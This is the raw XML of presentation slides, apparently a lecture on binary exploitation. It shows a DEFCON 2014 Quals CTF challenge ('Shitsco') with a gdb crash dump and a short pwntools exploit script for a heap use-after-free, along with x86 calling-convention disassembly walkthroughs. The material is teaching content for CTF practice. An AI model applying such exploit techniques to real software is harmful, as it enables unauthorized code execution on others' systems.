          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3303" name="Shape 3303"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3292" idx="3"/>
            <a:endCxn id="3297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1743700"/>
            <a:ext cx="55860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7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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3309" name="Shape 3309"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1104174"/>
            <a:ext cx="8377200" cy="393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Welcome to Shitsco Internet Operating System (IOS)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For a command list, enter ?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$ set a aaaaaaaaaaaaaaaa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$ set b bbbbbbbbbbbbbbbb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$ set a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$ set b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$ set c AAAABBBBCCCCDDDD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$ show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c: AAAABBBBCCCCDDDD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Program received signal SIGSEGV, Segmentation fault.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[----------------------------------registers-----------------------------------]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EAX: 0x0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EBX: 0xf7fb7000 --&gt; 0x1b1db0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ECX: 0xffffffff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EDX: 0x42424242 ('BBBB')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ESI: 0xffffd038 --&gt; 0x80499f6 --&gt; 0x25000a73 ('s\n')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EDI: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0x42424242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('BBBB')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EBP: 0xffffd478 --&gt; 0xffffd4b8 --&gt; 0x804c2ec --&gt; 0x8049b0c ("show")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ESP: 0xffffcf90 --&gt; 0xf7fb7d60 --&gt; 0xfbad2a84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EIP: 0xf7e49353 (&lt;vfprintf+8899&gt;:       repnz scas al,BYTE PTR es:[edi])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EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)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3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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3315" name="Shape 3315"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664600" y="1143000"/>
            <a:ext cx="6741600" cy="376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from pwn import *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context(log_level='debug')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 = process('./shitsco')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def set(key, value):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p.recvuntil('$ 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p.sendline('set %s %s' % (key, value))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def show():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p.recvuntil('$ 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p.sendline('show')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set('a', 'a' * 16)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set('b', 'b' * 16)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set('a', '')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set('b', '')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set('c', 'AAAA' + p32(0x804c3a0) + p32(0x0804c08c) + 'A' * 4)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show()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p.interactive()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Shape 33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321" name="Shape 33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50682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50682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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1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sub    $0x10,%esp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call   1f &lt;caller+0xd&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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238" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402175" y="1425225"/>
            <a:ext cx="31467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callee(int a, int b, int c)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a + b + c;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caller(void)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ret;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 = callee(1, 2, 3);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 += 4;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ret;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3697100" y="2532950"/>
            <a:ext cx="8115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push   %ebp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sub    $0x10,%esp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call   1f &lt;caller+0xd&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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247" name="Shape 247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4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Shape 249"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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endParaRPr b="1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0" name="Shape 250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1" name="Shape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6491550" y="1114313"/>
            <a:ext cx="9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2" name="Shape 252"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-115147" y="1431436"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Shape 253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4" name="Shape 254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mov    %esp,%ebp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sub    $0x10,%esp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call   1f &lt;caller+0xd&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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262" name="Shape 262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6491550" y="1114313"/>
            <a:ext cx="9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4" name="Shape 264"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4574525" y="1656275"/>
            <a:ext cx="1385275" cy="274200"/>
            <a:chOff x="3512200" y="1633500"/>
            <a:chExt cx="1385275" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Shape 265"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3512200" y="1633500"/>
              <a:ext cx="900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%ebp</a:t>
              </a:r>
              <a:endParaRPr b="1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6" name="Shape 266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7" name="Shape 267"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-115147" y="1576781"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="Shape 268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9" name="Shape 269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sub    $0x10,%esp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call   1f &lt;caller+0xd&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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277" name="Shape 277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959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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3" name="Shape 283"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="284" name="Shape 284"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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85" name="Shape 285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6" name="Shape 286"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="2885459"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="Shape 287"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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endParaRPr b="1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88" name="Shape 288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9" name="Shape 289"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-115147" y="1736236"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Shape 290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1" name="Shape 291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sub    $0x10,%esp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push   $0x3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push   $0x2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</a:t>
            </a:r>
            <a:r>
              <a:rPr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push   $0x1</a:t>
            </a:r>
            <a:endParaRPr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call   1f &lt;caller+0xd&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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299" name="Shape 299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5959800" y="1792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ret</a:t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959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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05" name="Shape 305"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="306" name="Shape 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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07" name="Shape 307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8" name="Shape 308"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833591" y="3807181"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Shape 309"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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endParaRPr b="1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10" name="Shape 310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1" name="Shape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="3021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959800" y="3328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959800" y="3635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314" name="Shape 314"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-115147" y="2192025"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Shape 315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16" name="Shape 316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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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324" name="Shape 324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959800" y="1792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ret</a:t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959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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30" name="Shape 330"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Shape 331"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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2" name="Shape 332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3" name="Shape 333"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833591" y="4114260"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Shape 334"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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endParaRPr b="1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5" name="Shape 335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6" name="Shape 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="3021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959800" y="3328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5959800" y="3635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5959800" y="39427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 (callee)</a:t>
            </a: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-115147" y="3522703"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Shape 341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2" name="Shape 342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push   %ebp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mov    %esp,%ebp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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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350" name="Shape 350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5959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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959800" y="27139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491550" y="1114313"/>
            <a:ext cx="9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56" name="Shape 356"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348806" y="4432900"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Shape 357"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="112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%ebp</a:t>
              </a:r>
              <a:endParaRPr b="1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8" name="Shape 358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59" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="3021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959800" y="3328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5959800" y="3635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5959800" y="39427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 (callee)</a:t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5959800" y="42499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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-115147" y="3827503"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Shape 365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6" name="Shape 366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push   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%esp,%ebp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mov    0x8(%ebp),%edx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mov    0xc(%ebp),%eax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add    %eax,%edx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mov    0x10(%ebp),%eax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add    %edx,%eax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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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374" name="Shape 374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959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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80" name="Shape 380"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348806" y="4432900"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="381" name="Shape 381"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="112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%esp, %ebp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82" name="Shape 382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83" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="3021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959800" y="3328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959800" y="3635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5959800" y="39427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 (callee)</a:t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5959800" y="42499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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="385" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3816900" y="3789100"/>
            <a:ext cx="21429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9" name="Shape 389"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="384" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3824100" y="3481900"/>
            <a:ext cx="213570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0" name="Shape 390"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3859500" y="3174700"/>
            <a:ext cx="2100300" cy="12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91" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289775" y="4185850"/>
            <a:ext cx="132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%eax = 1 + 2 + 3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92" name="Shape 392"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-108086" y="4592389"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Shape 393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94" name="Shape 394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basic ideas and tools for binary exploitation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exploit for stack overflow/format string/UAF/heap overflow in modern Linux(Simple, open source, and CTF favored)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about CTFs, especially DEFCON CTF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to hack embedded devices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push   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%esp,%ebp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</a:t>
            </a:r>
            <a:r>
              <a:rPr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pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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402" name="Shape 402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959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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8" name="Shape 408"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348812" y="4109931"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Shape 409"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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endParaRPr b="1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0" name="Shape 410"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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11" name="Shape 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959800" y="3021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959800" y="3328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959800" y="3635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959800" y="39427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 (callee)</a:t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5959800" y="42499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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Shape 417"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr b="1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8" name="Shape 418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19" name="Shape 419"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-122200" y="4746411"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Shape 420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1" name="Shape 421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push   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%esp,%ebp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ret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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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429" name="Shape 429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5959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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5959800" y="3021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5959800" y="3328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5959800" y="3635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5959800" y="39427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5959800" y="42499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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Shape 441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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2" name="Shape 442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43" name="Shape 443"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348812" y="3805606"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Shape 444"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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endParaRPr b="1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5" name="Shape 445"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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-122200" y="2338786"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Shape 447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8" name="Shape 448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push   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%esp,%ebp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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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456" name="Shape 456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5959800" y="1792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ret</a:t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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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5959800" y="3021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5959800" y="3328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5959800" y="3635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5959800" y="39427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5959800" y="42499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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="468" name="Shape 468"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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69" name="Shape 469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70" name="Shape 470"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-122200" y="2491186"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="471" name="Shape 471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2" name="Shape 472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73" name="Shape 473"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348812" y="2891206"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="474" name="Shape 474"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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endParaRPr b="1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5" name="Shape 475"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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push   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%esp,%ebp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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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mov    %eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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mov    -0x4(%ebp),%eax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leave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483" name="Shape 483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5959800" y="1792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</a:rPr>
              <a:t>ret = callee(1, 2, 3) + 4</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight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5959800" y="2099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5959800" y="24067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5959800" y="27139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91550" y="1114313"/>
            <a:ext cx="9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5959800" y="3021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5959800" y="3328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5959800" y="3635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5959800" y="39427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5959800" y="42499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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4833600" y="1656275"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="Shape 495"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp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96" name="Shape 496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97" name="Shape 497"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-122200" y="2948386"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="498" name="Shape 498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99" name="Shape 499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00" name="Shape 500"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4348812" y="2891206"/>
            <a:ext cx="1610985" cy="274200"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="501" name="Shape 501"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="112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endParaRPr sz="1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2" name="Shape 502"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1770756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03" name="Shape 503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4128775" y="2507438"/>
            <a:ext cx="17619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%eax = callee(1, 2, 3)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push   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%esp,%ebp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sub    $0x10,%esp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call   1f &lt;callee&gt;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add    $0xc,%esp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%eax,-0x4(%ebp)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addl   $0x4,-0x4(%ebp)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-0x4(%ebp),%eax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leave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511" name="Shape 511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5959800" y="1792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5959800" y="2099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5959800" y="24067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5959800" y="27139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6491550" y="1114313"/>
            <a:ext cx="9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5959800" y="3021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5959800" y="3328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959800" y="3635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5959800" y="39427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5959800" y="42499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4509900" y="1656275"/>
            <a:ext cx="1449900" cy="274200"/>
            <a:chOff x="3447575" y="1633500"/>
            <a:chExt cx="1449900" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="523" name="Shape 523"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
